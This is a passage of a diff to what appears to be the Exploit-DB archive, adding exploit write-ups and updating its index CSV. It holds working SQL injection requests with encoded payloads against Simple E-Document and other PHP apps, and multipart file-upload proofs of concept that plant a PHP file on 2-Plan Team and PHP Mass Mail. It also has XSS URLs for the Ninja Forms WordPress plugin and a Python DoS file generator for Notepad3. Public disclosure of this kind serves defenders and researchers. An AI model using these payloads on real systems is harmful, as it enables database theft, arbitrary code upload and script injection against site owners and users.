Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2018 12:21:09 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
# POC:
# 4)
# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL]
#
GET /PATH/personal_notebook_category_edit.php?currentrow_fd0=%2d%31%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2018 12:22:49 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

48
exploits/php/webapps/45877.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Simple E-Document 1.31 - 'username' SQL Injection
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.tecorange.com/index.php/download-free-open-source-software/79-simple-e-document-free-open-source-document-and-paper-m
# Software Link: https://datapacket.dl.sourceforge.net/project/simplee-doc/simple_e_document_v_1_31.zip
# Version: 1.31
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# //[PATH]//login.php
# ....
#10 if(!isset($_POST['op'])) $_POST['op']='';
#11 if(!isset($_POST['username'])) $_POST['username']='';
#12 if(!isset($_POST['password'])) $_POST['password']='';
#13 if(!isset($op)) $op='';
#14
#15 $op = $_POST['op'];
#16 $username= stripslashes($_POST['username']);
#17 $password= stripslashes($_POST['password']);
#18 $r_password = md5($password);
#19
#20 $sql = "SELECT * From edocphp_users WHERE username='$username' AND password ='$r_password'";
# ....
# POC:
# 1)
# http://localhost/[PATH]/login.php
#
POST /PATH/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 267
username=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 07:44:24 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 241
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

84
exploits/php/webapps/45878.txt Normal file
View file

@ -0,0 +1,84 @@
# Exploit Title: 2-Plan Team 1.0.4 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://2-plan.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/to-plan-team/1.1.0/2-plan-team.tgz
# Version: 1.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Users..
# http://localhost/[PATH]/managefile.php?action=upload&id=1
#
POST /[PATH]/managefile.php?action=upload&id=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/managefile.php?action=showproject&id=1&mode=added
Cookie: PHPSESSID=2e9jrile8jqaqe9q1acs4i30j6
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------
10091208795715239061851145440
Content-Length: 1192
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="numfiles"
1
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="upfolder"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="userfile1-title"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="userfile1"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="userfile1"
phpinfo.php
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="userfile1-tags"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="desc"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="visible[]"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="sendto[]"
all
-----------------------------10091208795715239061851145440--
HTTP/1.1 302 Found
Date: Wed, 14 Nov 2018 23:41:03 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
GET /[PATH]/files/standard/ef/1/phpinfo_3978873.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2e9jrile8jqaqe9q1acs4i30j6
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 23:41:07 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

69
exploits/php/webapps/45879.txt Normal file
View file

@ -0,0 +1,69 @@
# Exploit Title: PHP Mass Mail 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://phpmassmail.sourceforge.io/
# Software Link: https://netix.dl.sourceforge.net/project/phpmassmail/phpmassmail/1.0.0/phpmassmail.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/send.php
#
# http://localhost/[PATH]/upload/[FILE]
# ....
#07 require("class.phpmailer.php");
#08
#09 $uploaddir = 'upload';
#10 $key = 0;
#11 $tmp_name = $_FILES["userfile"]["tmp_name"][$key];
#12 $name = $_FILES["userfile"]["name"][$key];
#13 $sendfile = "$uploaddir/$name";
#14 move_uploaded_file($tmp_name, $sendfile);
# ....
POST /[PATH]/send.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 716
Cookie: PHPSESSID=dhq0fbvco8d0sc0lem3l2kktk0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------265001916915724: undefined
Content-Disposition: form-data; name="userfile[]"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------265001916915724--
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 19:27:39 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 719
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/send.php
#
# http://localhost/[PATH]/upload/[FILE]
#
<html>
<body>
<form method="post" action="send.php" enctype="multipart/form-data">
<input name="userfile[]" type="file">
<input value="Send mail" type="submit">
</form>
</body>
</html>

29
exploits/php/webapps/45880.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
# Date: 2018-11-15
# Exploit Author: MTK
# Vendor Homepage: https://ninjaforms.com
# Softwae Link: https://wordpress.org/plugins/ninja-forms/
# Version: Up to V3.3.17
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : CVE-2018-19287
# Plugin description:
# Ninja Forms is the ultimate FREE form creation tool for WordPress. Build forms within minutes
# using a simple yet powerful drag-and-drop form creator. For beginners, quickly and easily
# design complex forms with absolutely no code. For developers, utilize built-in hooks,
# filters, and even custom field templates to do whatever you need at any step in
# the form building or submission using Ninja Forms as a framework.
# POC
|_1_|
http://127.0.0.1/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date&end_date="><img+src=mtk+onerror=alert(/MTK/);//&filter_action=Filter&paged=1&action2=-1
|_2_|
http://127.0.0.1/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src=mtk+onerror=alert(/MTK/);//&end_date&filter_action=Filter&paged=1&action2=-1
|_3_|
http://127.0.0.1/wp-admin/edit.php?post_status=trash&post_type=nf_sub&form_id=1"><script>alert(/MTK/);</script>&nf_form_filter&paged=1

2
exploits/windows/local/39666.txt
View file

@ -2,7 +2,7 @@ Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113
EDB Mirror: https://www.exploit-db.com/docs/39665.pdf
EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf
Trigger and exploit code for CVE-2014-4113:

2
exploits/windows/local/40823.txt
View file

@ -2,7 +2,7 @@ Complete Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40823.zip
Presentation:
https://www.exploit-db.com/docs/40822.pdf
https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf
I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016

29
exploits/windows_x86-64/dos/45869.py Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: Notepad3 1.0.2.350 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.rizonesoft.com/
# Software Link: https://netix.dl.sourceforge.net/project/notepad3/Notepad3%20Build%20350/Notepad3-1.0.2.350.exe
# Software Link: https://datapacket.dl.sourceforge.net/project/notepad3/Notepad3%20Build%20350/Notepad3-1.0.2.350_x86.zip
# Version: 1.0.2.350
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# File / Set Encryption Passphrase / Encrypt using Passphrase
#!/usr/bin/python
buffer = "A" * 256
payload = buffer
try:
f=open("exp.txt","w")
print "[+] Creating %s bytes evil payload." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created."

38
files_exploits.csv
View file

@ -6190,6 +6190,7 @@ id,file,description,date,author,type,platform,port
45829,exploits/windows/dos/45829.c,"Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service",2018-11-13,hyp3rlinx,dos,windows,
45850,exploits/windows_x86-64/dos/45850.py,"AMPPS 2.7 - Denial of Service (PoC)",2018-11-14,"Ihsan Sencan",dos,windows_x86-64,
45859,exploits/windows/dos/45859.py,"Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)",2018-11-14,Daniel,dos,windows,
45869,exploits/windows_x86-64/dos/45869.py,"Notepad3 1.0.2.350 - Denial of Service (PoC)",2018-11-15,"Ihsan Sencan",dos,windows_x86-64,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -6674,7 +6675,7 @@ id,file,description,date,author,type,platform,port
4178,exploits/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Local Privilege Escalation",2007-07-12,"Zohiartze Herce",local,windows,
4203,exploits/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords",2007-07-19,bunker,local,multiple,
4204,exploits/windows/local/4204.php,"PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow",2007-07-20,shinnai,local,windows,
4218,exploits/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,local,windows,
4218,exploits/windows/local/4218.php,"PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass",2007-07-24,shinnai,local,windows,
4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",local,windows,
4231,exploits/aix/local/4231.c,"IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,local,aix,
4232,exploits/aix/local/4232.sh,"IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,local,aix,
@ -6701,9 +6702,9 @@ id,file,description,date,author,type,platform,port
4460,exploits/linux_x86-64/local/4460.c,"Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",local,linux_x86-64,
4515,exploits/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,local,solaris,
4516,exploits/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,local,solaris,
4517,exploits/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,local,windows,
4517,exploits/windows/local/4517.php,"PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass",2007-10-11,shinnai,local,windows,
4531,exploits/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,local,windows,
4553,exploits/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,local,windows,
4553,exploits/windows/local/4553.php,"PHP 5.x COM - Safe Mode / Disable Functions Bypass",2007-10-22,shinnai,local,windows,
4564,exploits/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,local,multiple,
4570,exploits/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,local,multiple,
4571,exploits/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,local,multiple,
@ -9733,7 +9734,7 @@ id,file,description,date,author,type,platform,port
41999,exploits/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",local,linux,
42000,exploits/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",local,windows,
42020,exploits/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",local,windows,
42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",local,linux,
42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation",2017-05-22,"Google Security Research",local,linux,
42053,exploits/linux/local/42053.c,"KDE 4/5 - 'KAuth' Local Privilege Escalation",2017-05-18,Stealth,local,linux,
42059,exploits/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,local,windows,
42076,exploits/linux/local/42076.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux,
@ -9765,7 +9766,7 @@ id,file,description,date,author,type,platform,port
42310,exploits/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Local Privilege Escalation",2017-07-10,LiquidWorm,local,windows,
42319,exploits/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Local Privilege Escalation",2017-07-13,geoda,local,windows,
42325,exploits/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",local,windows,
42334,exploits/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",local,macos,
42334,exploits/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation",2017-07-18,"Mark Wadham",local,macos,
42356,exploits/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",local,linux,
42357,exploits/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",local,linux,
42368,exploits/windows_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,local,windows_x86-64,
@ -9934,7 +9935,7 @@ id,file,description,date,author,type,platform,port
44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
45565,exploits/windows_x86-64/local/45565.py,"Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)",2018-10-09,"Matteo Malvica",local,windows_x86-64,
44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Local Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware,
44649,exploits/windows/local/44649.py,"Prime95 29.4b8 - Stack Buffer Overflow (SEH)",2018-05-18,crash_manucoot,local,windows,
44652,exploits/linux/local/44652.py,"DynoRoot DHCP Client - Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
@ -9945,7 +9946,7 @@ id,file,description,date,author,type,platform,port
44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86,
44688,exploits/linux/local/44688.txt,"Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read",2018-05-22,"Paul Taylor",local,linux,
44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android,
44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows,
44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows,
@ -9996,7 +9997,7 @@ id,file,description,date,author,type,platform,port
45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux,
45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows,
45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS - Local Kernel root Exploit",2018-08-02,mu-b,local,solaris,
45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation",2018-08-02,mu-b,local,solaris,
45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45089,exploits/linux/local/45089.py,"Intenos IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
@ -10103,6 +10104,9 @@ id,file,description,date,author,type,platform,port
45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux,
45846,exploits/linux/local/45846.py,"ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)",2018-11-14,"Magnus Klaaborg Stubman",local,linux,
45854,exploits/macos/local/45854.txt,"SwitchVPN for macOS 2.1012.03 - Privilege Escalation",2018-11-14,"Bernd Leitner",local,macos,
45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux,
45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -35094,7 +35098,7 @@ id,file,description,date,author,type,platform,port
35142,exploits/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",webapps,php,
35143,exploits/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",webapps,php,
35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,webapps,php,
35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php,
35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php,
35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",webapps,php,
35150,exploits/php/webapps/35150.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)",2014-11-03,"Stefan Horst",webapps,php,443
35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,
@ -36936,7 +36940,7 @@ id,file,description,date,author,type,platform,port
38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php,
38118,exploits/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",webapps,xml,
38119,exploits/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",webapps,php,
38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function",2015-09-10,ylbhz,webapps,php,
38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library",2015-09-10,ylbhz,webapps,php,
38128,exploits/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",webapps,cgi,5000
38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",webapps,php,
38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,
@ -37715,7 +37719,7 @@ id,file,description,date,author,type,platform,port
39761,exploits/php/webapps/39761.txt,"WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",webapps,php,80
39762,exploits/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",webapps,cgi,80
39765,exploits/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",webapps,cgi,
39766,exploits/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,webapps,php,
39766,exploits/php/webapps/39766.php,"Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass",2016-05-04,RicterZ,webapps,php,
39777,exploits/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",webapps,asp,80
39780,exploits/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",webapps,jsp,443
39781,exploits/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,webapps,php,80
@ -40367,3 +40371,15 @@ id,file,description,date,author,type,platform,port
45856,exploits/php/webapps/45856.txt,"Pedidos 1.0 - SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
45857,exploits/php/webapps/45857.txt,"Electricks eCommerce 1.0 - Persistent Cross-Site Scripting",2018-11-14,"Nawaf Alkeraithe",webapps,php,80
45858,exploits/php/webapps/45858.txt,"DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload",2018-11-14,"Ihsan Sencan",webapps,php,80
45860,exploits/php/webapps/45860.txt,"Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin)",2018-11-15,"Ihsan Sencan",webapps,php,80
45861,exploits/php/webapps/45861.txt,"PHP-Proxy 5.1.0 - Local File Inclusion",2018-11-15,"Ameer Pornillos",webapps,php,80
45862,exploits/php/webapps/45862.txt,"BitZoom 1.0 - 'rollno' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
45863,exploits/php/webapps/45863.txt,"Net-Billetterie 2.9 - 'login' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
45864,exploits/php/webapps/45864.txt,"Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
